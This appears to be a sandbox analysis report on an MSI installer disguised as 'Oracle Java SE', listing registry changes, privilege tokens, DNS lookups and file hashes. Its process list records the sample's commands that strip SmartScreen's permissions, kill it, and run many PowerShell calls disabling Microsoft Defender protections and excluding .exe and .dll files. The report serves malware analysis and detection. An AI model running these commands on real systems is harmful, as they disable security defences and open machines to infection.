| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductIcon = "C:\\Windows\\Installer\\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\\Logo.ico" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554\ProductFeature | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Version = "134217999" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\PackageCode = "0EBA20D468628E64F92B33D46217DF75" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\PackageName = "1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductName = "Oracle Java SE" | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 707185549E31D1DBD77E92FD1C1AA14B
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 69E98055858974A0BC153E97A3A971BB E Global\MSI0000
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"
C:\Windows\syswow64\cmd.exe
"cmd.exe" /C "C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\smartscreen.exe" /a
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\smartscreen.exe" /reset
C:\Windows\SysWOW64\taskkill.exe
taskkill /im smartscreen.exe /f
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".dll""
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
Register.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| GB | 2.22.249.67:80 | repository.certum.pl | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.63.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| N/A | 127.0.0.1:60817 | tcp | |
| N/A | 127.0.0.1:60820 | tcp | |
| N/A | 127.0.0.1:60823 | tcp | |
| N/A | 127.0.0.1:60826 | tcp | |
| N/A | 127.0.0.1:60830 | tcp | |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.71.105.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B
| MD5 | d594524b9c081a8c600afd725d9ab3ad |
| SHA1 | 9fa3cb863fdf41273b02c381a01565a764fbd0de |
| SHA256 | a84c97e884df6d40003e5256e40118e5e5f5575ad5039e614dd997a92a9a5230 |
| SHA512 | 5a43d5a2a91394538cdc3d771ca035e6b353a0f3da9dc078d9a2eea047c7fb7399755155b1ef763be351d2cb8e3fe8dfcaf72c42ae87c7a6b0ccaf40a3a3b5cb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B
| MD5 | 6dc6905a6d95ce365a671ab8dc82fa6b |
| SHA1 | f21a03a87c7349422a276a53c00c88f010d7b184 |
| SHA256 | 12208ef455e048f59ce2738b65c46fea4841db302408285b0bbd7fb15f6afc2b |
| SHA512 | a0386ce09ef882362f5f829a9bc297fd151dc3e742747739cee2ff4ac737301e354ad464af7cfd6c81cb5fc84ce7764a7e21af0e50b66d0b5344b158470fa43c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4
| MD5 | b04dfc64dabfe7710377ebccff748e25 |
| SHA1 | f91cfb0d95fc3bc789e15bfa05b826bb01a0ec16 |
| SHA256 | 2218a64866292c09559ddabb7a1cceae04acb60091f73bcfb780d20e53cee959 |
